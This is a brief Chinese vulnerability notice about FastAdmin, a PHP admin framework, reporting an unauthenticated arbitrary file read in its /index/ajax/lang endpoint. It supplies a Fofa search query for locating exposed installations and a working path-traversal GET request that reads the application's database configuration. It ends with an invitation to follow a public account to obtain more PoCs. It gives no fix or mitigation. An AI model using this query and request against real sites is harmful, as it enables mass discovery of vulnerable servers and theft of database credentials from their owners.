产品介绍
FastAdmin是一款基于PHP+Bootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,同时确保后台系统的稳定性和安全性。
漏洞描述
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Fofa
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
POC:
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
读取数据库配置信息
更多POC获取
关注公众号:“安全小木屋”,回复POC即可获取POC,最新漏洞POC会更新至百度网盘链接。